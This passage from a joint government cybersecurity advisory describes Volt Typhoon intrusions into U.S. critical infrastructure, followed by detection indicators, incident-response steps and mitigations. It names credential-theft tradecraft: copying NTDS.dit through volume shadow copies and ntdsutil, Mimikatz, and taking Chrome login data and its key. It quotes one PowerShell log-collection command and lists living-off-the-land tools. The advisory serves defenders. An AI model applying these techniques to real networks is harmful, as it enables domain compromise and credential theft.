also consistently obtains valid credentials by extracting the Active Directory database file (NTDS.dit)—in some cases multiple times from the same victim over long periods [T1003.003]. NTDS.dit contains usernames, hashed passwords, and group memberships for all domain accounts, essentially allowing for full domain compromise if the hashes can be cracked offline. To obtain NTDS.dit, the U.S. authoring agencies have observed Volt Typhoon: Move laterally [TA0008] to the domain controller via an interactive RDP session using a compromised account with domain administrator privileges [T1021.001]; Execute the Windows-native vssadmin [T1006] command to create a volume shadow copy; Use Windows Management Instrumentation Console (WMIC) commands [T1047] to execute ntdsutil (a LOTL utility) to copy NTDS.dit and SYSTEM registry hive from the volume shadow copy; and Exfiltrate [TA0010] NTDS.dit and SYSTEM registry hive to crack passwords offline) [T1110.002]. (For more details, including specific commands used, see Appendix A: Volt Typhoon LOTL Activity.)Note: A volume shadow copy contains a copy of all the files and folders that exist on the specified volume. Each volume shadow copy created on a DC includes its NTDS.dit and the SYSTEM registry hive, which provides keys to decrypt the NTDS.dit file. Volt Typhoon actors have also been observed interacting with a PuTTY application by enumerating existing stored sessions [T1012]. Given this interaction and the exposure of cleartext-stored proxy passwords used in remote administration, Volt Typhoon actors potentially had access to PuTTY profiles that allow access to critical systems (see the Lateral Movement section). According to industry reporting, Volt Typhoon actors attempted to dump credentials through LSASS (see Appendix B for commands used).[2] The U.S. authoring agencies have observed Volt Typhoon actors leveraging Mimikatz to harvest credentials, and industry partners have observed Volt Typhoon leveraging Impacket.[2] Mimikatz is a credential dumping tool and Volt Typhoon actors use it to obtain credentials. In one confirmed compromise, the Volt Typhoon used RDP to connect to a server and run Mimikatz after leveraging a compromised administrator account to deploy it. Impacket is an open source Python toolkit for programmatically constructing and manipulating network protocols. It contains tools for Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks—as well as remote service execution. Discovery Volt Typhoon actors have been observed using commercial tools, LOTL utilities, and appliances already present on the system for system information [T1082], network service [T1046], group [T1069] and user [T1033] discovery. Volt Typhoon uses at least the following LOTL tools and commands for system information, network service, group, and user discovery techniques: cmd certutil dnscmd ldifde makecab net user/group/use netsh nltest netstat ntdsutil ping PowerShell quser reg query/reg save systeminfo tasklist wevtutil whoami wmic xcopy Some observed specific examples of discovery include: Capturing successful logon events [T1654]. Specifically, in one incident, analysis of the PowerShell console history of a domain controller indicated that security event logs were directed to a file named user.dat, as evidenced by the executed command Get-EventLog security -instanceid 4624 -after [year-month-date] | fl * | Out-File ‘C:\users\public\documents\user.dat’. This indicates the group’s specific interest in capturing successful logon events (event ID 4624) to analyze user authentication patterns within the network. Additionally, file system analysis, specifically of the Master File Table (MFT), uncovered evidence of a separate file, systeminfo.dat, which was created in C:\Users\Public\Documents but subsequently deleted [T1070.004]. The presence of these activities suggests a methodical approach by Volt Typhoon actors in collecting and then possibly removing traces of sensitive log information from the compromised system. Executing tasklist /v to gather a detailed process listing [T1057], followed by executing taskkill /f /im rdpservice.exe (the function of this executable is not known). Executing net user and quser for user account information [T1087.001]. Creating and accessing a file named rult3uil.log on a domain controller in C:\Windows\System32\. The rult3uil.log file contained user activities on a compromised system, showcasing a combination of window title information [T1010] and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps. Employing ping with various IP addresses to check network connectivity [T1016.001] and net start to list running services [T1007]. See Appendix A for additional LOTL examples. In one confirmed compromise, Volt Typhoon actors attempted to use Advanced IP Scanner, which was on the network for admin use, to scan the network. Volt Typhoon actors have been observed strategically targeting network administrator web browser data—focusing on both browsing history and stored credentials [T1555.003]—to facilitate targeting of personal email addresses (see the Reconnaissance section) for further discovery and possible network modifications that may impact the threat actor’s persistence within victim networks. In one confirmed compromise: Volt Typhoon actors obtained the history file from the User Data directory of a network administrator user’s Chrome browser. To obtain the history file, Volt Typhoon actors first executed an RDP session to the user’s workstation where they initially attempted, and failed, to obtain the C$ File Name: users\{redacted}\appdata\local\Google\Chrome\UserData\default\History file, as evidenced by the accompanying 1016 (reopen failed) SMB error listed in the application event log. The threat actors then disconnected the RDP session to the workstation and accessed the file C:\Users\{redacted}\Downloads\History.zip. This file presumably contained data from the User Data directory of the user’s Chrome browser, which the actors likely saved in the Downloads directory for exfiltration [T1074]. Shortly after accessing the history.zip file, the actors terminated RDP sessions. About four months later, Volt Typhoon actors accessed the same user’s Chrome data C$ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Local State and $ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Default\Login Data via SMB. The Local State file contains the Advanced Encryption Standard (AES) encryption key [T1552.004] used to encrypt the passwords stored in the Chrome browser, which would enable the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser. In another confirmed compromise, Volt Typhoon actors accessed directories containing Chrome and Edge user data on multiple systems. Directory interaction was observed over the network to paths such as C:\Users\{redacted}\AppData\Local\Google\Chrome\User Data\ and C:\Users\{redacted}\AppData\Local\Microsoft\Edge\User Data\. They also enumerated several directories, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings [T1083]. Lateral Movement For lateral movement, Volt Typhoon actors have been observed predominantly employing RDP with compromised valid administrator credentials. Note: With a full on-premises Microsoft Active Directory identity compromise (see the Credential Access section), the group may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement [T1550]. In one confirmed compromise of a Water and Wastewater Systems Sector entity, after obtaining initial access, Volt Typhoon actors connected to the network via a VPN with administrator credentials they obtained and opened an RDP session with the same credentials to move laterally. Over a nine-month period, they moved laterally to a file server, a domain controller, an Oracle Management Server (OMS), and a VMware vCenter server. The actors obtained domain credentials from the domain controller and performed discovery, collection, and exfiltration on the file server (see the Discovery and Collection and Exfiltration sections). Volt Typhoon’s movement to the vCenter server was likely strategic for pre-positioning to OT assets. The vCenter server was adjacent to OT assets, and Volt Typhoon actors were observed interacting with the PuTTY application on the server by enumerating existing stored sessions. With this information, Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, OT systems, and network security devices. This would enable them to access these critical systems [T1563]. See Figure 2. Figure 2: Volt Typhoon Lateral Movement Path File Server, DC, and OT-Adjacent Assets Additionally, Volt Typhoon actors have been observed using PSExec to execute remote processes, including the automated acceptance of the end-user license agreement (EULA) through an administrative account, signified by the accepteula command flag. Volt Typhoon actors may have attempted to move laterally to a cloud environment in one victim’s network but direct attribution to the Volt Typhoon group was inconclusive. During the period of the their known network presence, there were anomalous login attempts to an Azure tenant [T1021.007] potentially using credentials [T1078.004] previously compromised from theft of NTDS.dit. These attempts, coupled with misconfigured virtual machines with open RDP ports, suggested a potential for cloud-based lateral movement. However, subsequent investigations, including password changes and multifactor authentication (MFA) implementations, revealed authentication failures from non-associated IP addresses, with no definitive link to Volt Typhoon. Collection and Exfiltration The U.S. authoring agencies assess Volt Typhoon primarily collects information that would facilitate follow-on actions with physical impacts. For example, in one confirmed compromise, they collected [TA0009] sensitive information obtained from a file server in multiple zipped files [T1560] and likely exfiltrated [TA0010] the files via Server Message Block (SMB) [T1048] (see Figure 3). Collected information included diagrams and documentation related to OT equipment, including supervisory control and data acquisition (SCADA) systems, relays, and switchgear. This data is crucial for understanding and potentially impacting critical infrastructure systems, indicating a focus on gathering intelligence that could be leveraged in actions targeting physical assets and systems. Figure 3: Volt Typhoon Attack Path for Exfiltration of Data from File Server In another compromise, Volt Typhoon actors leveraged WMIC to create and use temporary directories (C:\Users\Public\pro, C:\Windows\Temp\tmp, C:\Windows\Temp\tmp\Active Directory and C:\Windows\Temp\tmp\registry) to stage the extracted ntds.dit and SYSTEM registry hives from ntdsutil execution volume shadow copies (see the Credential Access section) obtained from two DCs. They then compressed and archived the extracted ntds.dit and accompanying registry files by executing ronf.exe, which was likely a renamed version of the archive utility rar.exe) [T1560.001]. Command and Control Volt Typhoon actors have been observed leveraging compromised SOHO routers and virtual private servers (VPS) to proxy C2 traffic. For more information, see DOJ press release U.S. Government Disrupts Botnet People’s Republic of China Used to Conceal Hacking of Critical Infrastructure). They have also been observed setting up FRP clients [T1090] on a victim’s corporate infrastructure to establish covert communications channels [T1573] for command and control. In one instance, Volt Typhoon actors implanted the FRP client with filename SMSvcService.exe on a Shortel Enterprise Contact Center (ECC) server and a second FRP client with filename Brightmetricagent.exe on another server. These clients, when executed via PowerShell [T1059.001], open reverse proxies between the compromised system and Volt Typhoon C2 servers. Brightmetricagent.exe has additional capabilities. The FRP client can locate servers behind a network firewall or obscured through Network Address Translation (NAT) [T1016]. It also contains multiplexer libraries that can bi-directionally stream data over NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management Instrumentation (WMI), and Z Shell (zsh) [T1059.004]. See Appendix C and MAR-10448362-1.v1 for more information. In the same compromise, Volt Typhoon actors exploited a Paessler Router Traffic Grapher (PRTG) server as an intermediary for their FRP operations. To facilitate this, they used the netsh command, a legitimate Windows command, to create a PortProxy registry modification [T1112] on the PRTG server [T1090.001]. This key alteration redirected specific port traffic to Volt Typhoon’s proxy infrastructure, effectively converting the PRTG’s server into a proxy for their C2 traffic [T1584.004] (see Appendix B for details). DETECTION/HUNT RECOMMENDATIONS Apply Living off the Land Detection Best Practices Apply the prioritized detection and hardening best practice recommendations provided in joint guide Identifying and Mitigating Living off the Land Techniques. Many organizations lack security and network management best practices (such as established baselines) that support detection of malicious LOTL activity—this makes it difficult for network defenders to discern legitimate behavior from malicious behavior and conduct behavior analytics, anomaly detection, and proactive hunting. Conventional IOCs associated with the malicious activity are generally lacking, complicating network defenders’ efforts to identify, track, and categorize this sort of malicious behavior. This advisory provides guidance for a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques. Review Application, Security, and System Event Logs Routinely review application, security, and system event logs, focusing on Windows Extensible Storage Engine Technology (ESENT) Application Logs. Due to Volt Typhoon’s ability for long-term undetected persistence, network defenders should assume significant dwell time and review specific application event log IDs, which remain on endpoints for longer periods compared to security event logs and other ephemeral artifacts. Focus on Windows ESENT logs because certain ESENT Application Log event IDs (216, 325, 326, and 327) may indicate actors copying NTDS.dit. See Table 1 for examples of ESENT and other key log indicators that should be investigated. Please note that incidents may not always have exact matches listed in the Event Detail column due to variations in event logging and TTPs. Table 1: Key Log Indicators for Detecting Volt Typhoon Activity Event ID (Log) Event Detail Description 216 (Windows ESENT Application Log) A database location change was detected from ‘C:\Windows\NTDS\ntds.dit’ to ‘\\?\GLOBALROOT\Device\{redacted}VolumeShadowCopy1\Windows\NTDS\ntds.dit’ A change in the NTDS.dit database location is detected. This could suggest an initial step in NTDS credential dumping where the database is being prepared for extraction. 325 (Windows ESENT Application Log) The database engine created a new database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit). Indicates creation of a new NTDS.dit file in a non-standard directory. Often a sign of data staging for exfiltration. Monitor for unusual database operations in temp directories. 637 (Windows ESENT Application Log) C:\Windows\Temp\tmp\Active Directory\ntds.jfm-++- (0) New flush map file “C:\Windows\Temp\tmp\Active Directory\ntds.jfm” will be created to enable persisted lost flush detection. A new flush map file is being created for NTDS.dit. This may suggest ongoing operations related to NTDS credential dumping, potentially capturing uncommitted changes to the NTDS.dit file. 326 (Windows ESENT Application Log) NTDS-++-12460,D,100-++–++-1-++- C:\$SNAP_{redacted}_VOLUMEC$\Windows\NTDS\ntds.dit-++-0-++- [1] The database engine attached a database. Began mounting of C:\Windows\NTDS\ntds.dit file created from volume shadow copy process Represents the mounting of an NTDS.dit file from a volume shadow copy. This is a critical step in NTDS credential dumping, indicating active manipulation of a domain controller’s data. 327 (Windows ESENT Application Log) C:\Windows\Temp\tmp\Active Directory\ntds.dit-++-1-++- [1] The database engine detached a database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit). Completion of mounting of ntds.dit file to C:\Windows\Temp\tmp\Active Director The detachment of a database, particularly in a temp directory, could indicate the completion of a credential dumping process, potentially as part of exfiltration preparations. 21 (Windows Terminal Services Local Session Manager Operational Log) Remote Desktop Services: Session logon succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted} Successful authentication to a Remote Desktop Services session. 22 (Windows Terminal Services Local Session Manager Operational Log) Remote Desktop Services: Shell start notification received: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted} Successful start of a new Remote Desktop session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected. 23 (Windows Terminal Services Local Session Manager Operational Log) Remote Desktop Services: Session logoff succeeded: User: {redacted}\{redacted} Session ID: {redacted} Successful logoff of Remote Desktop session. 24 (Windows Terminal Services Local Session Manager Operational Log) Remote Desktop Services: Session has been disconnected: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted} Remote Desktop session disconnected by user or due to network connectivity issues. 25 (Windows  Terminal Services Local Session Manager Operational Log) Remote Desktop Services: Session reconnection succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted} Successful reconnection to a Remote Desktop Services session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected. 1017 (Windows System Log) Handle scavenged. Share Name: C$ File Name: users\{redacted}\downloads\History.zip Durable: 1 Resilient or Persistent: 0 Guidance: The server closed a handle that was previously reserved for a client after 60 seconds. Indicates the server closed a handle for a client. While common in network operations, unusual patterns or locations (like History.zip in a user’s downloads) may suggest data collection from a local system. 1102 (Windows Security Log) All All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known Volt Typhoon tactic to cover their tracks. Monitor and Review OT System Logs Review access logs for communication paths between IT and OT networks, looking for anomalous accesses or protocols. Measure the baseline of normal operations and network traffic for the industrial control system (ICS) and assess traffic anomalies for malicious activity. Configure intrusion detection systems (IDS) to create alarms for any ICS network traffic outside normal operations. Track and monitor audit trails on critical areas of ICS. Set up security incident and event monitoring (SIEM) to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts. Review CISA’s Recommended Cybersecurity Practices for Industrial Control Systems and the joint advisory, NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, for further OT system detection and mitigation guidance. Use gait to Detect Possible Network Proxy Activities Use gait[4] to detect network proxy activities. Developed by Sandia National Labs, gait is a publicly available Zeek[5] extension. The gait extension can help enrich Zeek’s network connection monitoring and SSL logs by including additional metadata in the logs. Specifically, gait captures unique TCP options and timing data such as a TCP, transport layer security (TLS), and Secure Shell (SSH) layer inferred round trip times (RTT), aiding in the identification of the software used by both endpoints and intermediaries. While the gait extension for Zeek is an effective tool for enriching network monitoring logs with detailed metadata, it is not specifically designed to detect Volt Typhoon actor activities. The extension’s capabilities extend to general anomaly detection in network traffic, including—but not limited to—proxying activities. Therefore, while gait can be helpful in identifying tactics similar to those used by Volt Typhoon, such as proxy networks and FRP clients for C2 communication, not all proxying activities detected by using this additional metadata are necessarily indicative of Volt Typhoon presence. It serves as a valuable augmentation to current security stacks for a broader spectrum of threat detection. For more information, see Sandia National Lab’s gait GitHub page sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies. Review Logins for Impossible Travel Examine VPN or other account logon times, frequency, duration, and locations. Logons from two geographically distant locations within a short timeframe from a single user may indicate an account is being used maliciously. Logons of unusual frequency or duration may indicate a threat actor attempting to access a system repeatedly or maintain prolonged sessions for the purpose of data extraction. Review Standard Directories for Unusual Files Review directories, such as C:\windows\temp\ and C:\users\public\, for unexpected or unusual files. Monitor these temporary file storage directories for files typically located in standard system paths, such as the System32 directory. For example, Volt Typhoon has been observed downloading comsvcs.dll to a non-standard folder (this file is normally found in the System32 folder). INCIDENT RESPONSE If compromise, or potential compromise, is detected, organizations should assume full domain compromise because of Volt Typhoon’s known behavioral pattern of extracting the NTDS.dit from the DCs. Organizations should immediately implement the following immediate, defensive countermeasures: Sever the enterprise network from the internet. Note: this step requires the agency to understand its internal and external connections. When making the decision to sever internet access, knowledge of connections must be combined with care to avoid disrupting critical functions. If you cannot sever from the internet, shutdown all non-essential traffic between the affected enterprise network and the internet. Reset credentials of privileged and non-privileged accounts within the trust boundary of each compromised account. Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. The krbtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The krbtgt account should be reset twice because the account has a two-password history. The first account reset for the krbtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA’s Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to FCEB agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise. Review access policies to temporarily revoke privileges/access for affected accounts/devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to “contain” them. Reset the relevant account credentials or access keys if the investigation finds the threat actor’s access is limited to non-elevated permissions. Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access. Audit all network appliance and edge device configurations with indicators of malicious activity for signs of unauthorized or malicious configuration changes. Organizations should ensure they audit the current network device running configuration and any local configurations that could be loaded at boot time. If configuration changes are identified: Change all credentials being used to manage network devices, to include keys and strings used to secure network device functions (SNMP strings/user credentials, IPsec/IKE preshared keys, routing secrets, TACACS/RADIUS secrets, RSA keys/certificates, etc.). Update all firmware and software to the latest version. Report the compromise to an authoring agency (see the Contact Information section). For organizations with cloud or hybrid environments, apply best practices for identity and credential access management.  Verify that all accounts with privileged role assignments are cloud native, not synced from Active Directory. Audit conditional access policies to ensure Global Administrators and other highly privileged service principals and accounts are not exempted. Audit privileged role assignments to ensure adherence to the principle of least privilege when assigning privileged roles. Leverage just-in-time and just-enough access mechanisms when administrators need to elevate to a privileged role. In hybrid environments, ensure federated systems (such as AD FS) are configured and monitored properly. Audit Enterprise Applications for recently added applications and examine the API permissions assigned to each. Reconnect to the internet. Note: The decision to reconnect to the internet depends on senior leadership’s confidence in the actions taken. It is possible—depending on the environment—that new information discovered during pre-eviction and eviction steps could add additional eviction tasks. Minimize and control use of remote access tools and protocols by applying best practices from joint Guide to Securing Remote Access Software and joint Cybersecurity Information Sheet: Keeping PowerShell: Security Measures to Use and Embrace. Consider sharing technical information with an authoring agency and/or a sector-specific information sharing and analysis center. For more information on incident response and remediation, see: Joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity. This advisory provides incident response best practices. CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to U.S. Federal Civilian Executive Branch (FCEB) agencies, the playbooks are applicable to all organizations. The incident response playbook provides procedures to identify, coordinate, remediate, recover, and track successful mitigations from incidents. Joint Water and Wastewater Sector – Incident Response Guide. This joint guide provides incident response best practices and information on federal resources for Water and Wastewater Systems Sector organizations. MITIGATIONS These mitigations are intended for IT administrators in critical infrastructure organizations. The authoring agencies recommend that software manufactures incorporate secure by design and default principles and tactics into their software development practices to strengthen the security posture for their customers. For information on secure by design practices that may protect customers against common Volt Typhoon techniques, see joint guide Identifying and Mitigating Living off the Land Techniques and joint Secure by Design Alert Security Design Improvements for SOHO Device Manufacturers. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide. The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of Volt Typhoon activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. IT Network Administrators and Defenders Harden the Attack Surface Apply patches for internet-facing systems within a risk-informed span of time [CPG 1E]. Prioritize patching critical assets, known exploited vulnerabilities, and vulnerabilities in appliances known to be frequently exploited by Volt Typhoon (e.g., Fortinet, Ivanti, NETGEAR, Citrix, and Cisco devices). Apply vendor-provided or industry standard hardening guidance to strengthen software and system configurations. Note: As part of CISA’s Secure by Design campaign, CISA urges software manufacturers to prioritize secure by default configurations to eliminate the need for customer implementation of hardening guidelines. Maintain and regularly update an inventory of all organizational IT assets [CPG 1A]. Use third party assessments to validate current system and network security compliance via security architecture reviews, penetration tests, bug bounties, attack surface management services, incident simulations, or table-top exercises (both announced and unannounced) [CPG 1F]. Limit internet exposure of systems when not necessary. An organization’s primary attack surface is the combination of the exposure of all its internet-facing systems. Decrease the attack surface by not exposing systems or management interfaces to the internet when not necessary. Plan “end of life” for technology beyond manufacturer supported lifecycle. Inventories of organizational assets should be leveraged in patch and configuration management as noted above. Inventories will also enable identification of technology beyond the manufacturer’s supported lifecycle. Where technology is beyond “end of life” or “end of support,” additional cybersecurity vigilance is necessary, and may warrant one or more of the following: Supplemental support agreements; Additional scanning and testing; Configuration changes; Isolation; Segmentation; and Development of forward-looking plans to facilitate replacement. Secure Credentials Do not store credentials on edge appliances/devices. Ensure edge devices do not contain accounts that could provide domain admin access. Do not store plaintext credentials on any system [CPG 2L]. Credentials should be stored securely—such as with a credential/password manager or vault, or other privileged account management solutions—so they can only be accessed by authenticated and authorized users. Change default passwords [CPG 2A] and ensure they meet the policy requirements for complexity. Implement and enforce an organizational system-enforced policy that: Requires passwords for all IT password-protected assets to be at least 15 characters; Does not allow users to reuse passwords for accounts, applications, services, etc., [CPG 2C]; and Does not allow service accounts/machine accounts to reuse passwords from member user accounts. Configure Group Policy settings to prevent web browsers from saving passwords and disable autofill functions. Disable the storage of clear text passwords in LSASS memory. Secure Accounts Implement phishing-resistant MFA for access to assets [CPG 2H]. Separate user and privileged accounts. User accounts should never have administrator or super-user privileges [CPG 2E]. Administrators should never use administrator accounts for actions and activities not associated with the administrator role (e.g., checking email, web browsing). Enforce the principle of least privilege. Ensure administrator accounts only have the minimum permissions necessary to complete their tasks. Review account permissions for default/accounts for edge appliances/devices and remove domain administrator privileges, if identified. Significantly limit the number of users with elevated privileges. Implement continuous monitoring for changes in group membership, especially in privileged groups, to detect and respond to unauthorized modifications. Remove accounts from high-privilege groups like Enterprise Admins and Schema Admins. Temporarily reinstate these privileges only when necessary and under strict auditing to reduce the risk of privilege abuse. Transition to Group Managed Service Accounts (gMSAs) where suitable for enhanced management and security of service account credentials. gMSAs provide automated password management and simplified Service Principal Name (SPN) management, enhancing security over traditional service accounts. See Microsoft’s Group Managed Service Accounts Overview. Enforce strict policies via Group Policy and User Rights Assignments to limit high-privilege service accounts. Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 2L]. PAM solutions can also log and alert usage to detect any unusual activity. Complement the PAM solution with role-based access control (RBAC) for tailored access based on job requirements. This ensures that elevated access is granted only when required and for a limited duration, minimizing the window of opportunity for abuse or exploitation of privileged credentials. Implement an Active Directory tiering model to segregate administrative accounts based on their access level and associated risk. This approach reduces the potential impact of a compromised account. See Microsoft’s PAM environment tier model. Harden administrative workstations to only permit administrative activities from workstations appropriately hardened based on the administrative tier. See Microsoft’s Why are privileged access devices important – Privileged access. Disable all user accounts and access to organizational resources of employees on the day of their departure [CPG 2G] Regularly audit all user, admin, and service accounts and remove or disable unused or unneeded accounts as applicable. Regularly roll NTLM hashes of accounts that support token-based authentication. Improve management of hybrid (cloud and on-premises) identity federation by: Using cloud only administrators that are asynchronous with on-premises environments and ensuring on-premises administrators are asynchronous to the cloud. Using CISA’s SCuBAGear tool to discover cloud misconfigurations in Microsoft cloud tenants. SCuBA gear is automation script for comparing Federal Civilian Executive Branch (FCEB) agency tenant configurations against CISA M365 baseline recommendations. SCuBAGear is part of CISA’s Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies, securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. For more information on SCuBAGear see CISA’s Secure Cloud Business Applications (SCuBA) Project. Using endpoint detection and response capabilities to actively defend on-premises federation servers. Secure Remote Access Services Limit the use of RDP and other remote desktop services. If RDP is necessary, apply best practices, including auditing the network for systems using RDP, closing unused RDP ports, and logging RDP login attempts. Disable Server Message Block (SMB) protocol version 1 and upgrade to version 3 (SMBv3) after mitigating existing dependencies (on existing systems or applications), as they may break when disabled. Harden SMBv3 by implementing guidance included in joint #StopRansomware Guide (see page 8 of the guide). Apply mitigations from the joint Guide to Securing Remote Access Software. Secure Sensitive Data Securely store sensitive data (including operational technology documentation, network diagrams, etc.), ensuring that only authenticated and authorized users can access the data. Implement Network Segmentation Ensure that sensitive accounts use their administrator credentials only on hardened, secure computers. This practice can reduce lateral movement exposure within networks. Conduct comprehensive trust assessments to identify business-critical trusts and apply necessary controls to prevent unauthorized cross-forest/domain traversal. Harden federated authentication by enabling Secure Identifier (SID) Filtering and Selective Authentication on AD trust relationships to further restrict unauthorized access across domain boundaries. Implement network segmentation to isolate federation servers from other systems and limit allowed traffic to systems and protocols that require access in accordance with Zero Trust principles. Secure Cloud Assets Harden cloud assets in accordance with vendor-provided or industry standard hardening guidance. Organizations with Microsoft cloud infrastructure, see CISA’s Microsoft 365 Security Configuration Baseline Guides, which provide minimum viable secure configuration baselines for Microsoft Defender for Office 365, Azure Active Directory (now known as Microsoft Entra ID), Exchange Online, OneDrive for Business, Power BI, Power Platform, SharePoint Online, and Teams. For additional guidance, see the Australian Signals Directorate’s Blueprint for Secure Cloud. Organizations with Google cloud infrastructure, see CISA’s Google Workspace Security Configuration Baseline Guides, which provide minimum viable secure configuration baselines for Groups for Business, GMAIL, Google Calendar, Google Chat, Google Common Controls, Google Classroom, Google Drive and Docs, Google Meet, and Google Sites. Revoke unnecessary public access to cloud environment. This involves reviewing and restricting public endpoints and ensuring that services like storage accounts, databases, and virtual machines are not publicly accessible unless absolutely necessary. Disable legacy authentication protocols across all cloud services and platforms. Legacy protocols frequently lack support for advanced security mechanisms such as multifactor authentication, rendering them susceptible to compromises. Instead, enforce the use of modern authentication protocols that support stronger security features like MFA, token-based authentication, and adaptive authentication measures. Enforce this practice through the use of Conditional Access Policies. These policies can initially be run in report-only mode to identify potential impacts and plan mitigations before fully enforcing them. This approach allows organizations to systematically control access to their cloud resources, significantly reducing the risk of unauthorized access and potential compromise. Regularly monitor and audit privileged cloud-based accounts, including service accounts, which are frequently abused to enable broad cloud resource access and persistence. Be Prepared Ensure logging is turned on for application, access, and security logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and VPNs) [CPG 2T]. Given Volt Typhoon’s use of LOTL techniques and their significant dwell time, application event logs may be a valuable resource to hunt for Volt Typhoon activity because these logs typically remain on endpoints for relatively long periods of time. For OT assets where logs are non-standard or not available, collect network traffic and communications between those assets and other assets. Implement file integrity monitoring (FIM) tools to detect unauthorized changes. Store logs in a central system, such as a security information and event management (SIEM) tool or central database. Ensure the logs can only be accessed or modified by authorized and authenticated users [CPG 2U]. Store logs for a period informed by risk or pertinent regulatory guidelines. Tune log alerting to reduce noise while ensuring there are alerts for high-risk activities. (For information on alert tuning, see joint guide Identifying and Mitigating Living Off the Land Techniques.) Establish and continuously maintain a baseline of installed tools and software, account behavior, and network traffic. This way, network defenders can identify potential outliers, which may indicate malicious activity. Note: For information on establishing a baseline, see joint guide Identifying and Mitigating Living off the Land Techniques. Document a list of threats and cyber actor TTPs relevant to your organization (e.g., based on industry or sectors), and maintain the ability (such as via rules, alerting, or commercial prevention and detection systems) to detect instances of those key threats [CPG 3A]. Implement periodic training for all employees and contractors that covers basic security concepts (such as phishing, business email compromise, basic operational security, password security, etc.), as well as fostering an internal culture of security and cyber awareness [CPG 2I]. Tailor the training to network IT personnel/administrators and other key staff based on relevant organizational cyber threats and TTPs, such as Volt Typhoon. For example, communicate that Volt Typhoon actors are known to target personal email accounts of IT staff, and encourage staff to protect their personal email accounts by using strong passwords and implementing MFA. In addition to basic cybersecurity training, ensure personnel who maintain or secure OT as part of their regular duties receive OT-specific cybersecurity training on at least an annual basis [CPG 2J]. Educate users about the risks associated with storing unprotected passwords. OT Administrators and Defenders Change default passwords [CPG 2A] and ensure they meet the policy requirements for complexity. If the asset’s password cannot be changed, implement compensating controls for the device; for example, segment the device into separate enclaves and implement increased monitoring and logging. Require that passwords for all OT password-protected assets be at least 15 characters, when technically feasible. In instances where minimum passwords lengths are not technically feasible (for example, assets in remote locations), apply compensating controls, record the controls, and log all login attempts. [CPG 2B]. Enforce strict access policies for accessing OT networks. Develop strict operating procedures for OT operators that details secure configuration and usage. Segment OT assets from IT environments by [CPG 2F]: Denying all connections to the OT network by default unless explicitly allowed (e.g., by IP address and port) for specific system functionality. Requiring necessary communications paths between IT and OT networks to pass through an intermediary, such as a properly configured firewall, bastion host, “jump box,” or a demilitarized zone (DMZ), which is closely monitored, captures network logs, and only allows connections from approved assets. Closely monitor all connections into OT networks for misuse, anomalous activity, or OT protocols. Monitor for unauthorized controller change attempts. Implement integrity checks of controller process logic against a known good baseline. Ensure process controllers are prevented from remaining in remote program mode while in operation if possible. Lock or limit set points in control processes to reduce the consequences of unauthorized controller access. Be prepared by: Determining your critical operational processes’ reliance on key IT infrastructure: Maintain and regularly update an inventory of all organizational OT assets. Understand and evaluate cyber risk on “as-operated” OT assets. Create an accurate “as-operated” OT network map and identify OT and IT network inter-dependencies. Identifying a resilience plan that addresses how to operate if you lose access to or control of the IT and/or OT environment. Plan for how to continue operations if a control system is malfunctioning, inoperative, or actively acting contrary to the safe and reliable operation of the process. Develop workarounds or manual controls to ensure ICS networks can be isolated if the connection to a compromised IT environment creates risk to the safe and reliable operation of OT processes. Create and regularly exercise an incident response plan. Regularly test manual controls so that critical functions can be kept running if OT networks need to be taken offline. Implement regular data backup procedures on OT networks. Regularly test backup procedures. Follow risk-informed guidance in the joint advisory NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, the NSA advisory Stop Malicious Cyber Activity Against Connected Operational Technology. CONTACT INFORMATION US organizations: To report suspicious or criminal activity related to information found in this joint Cybersecurity 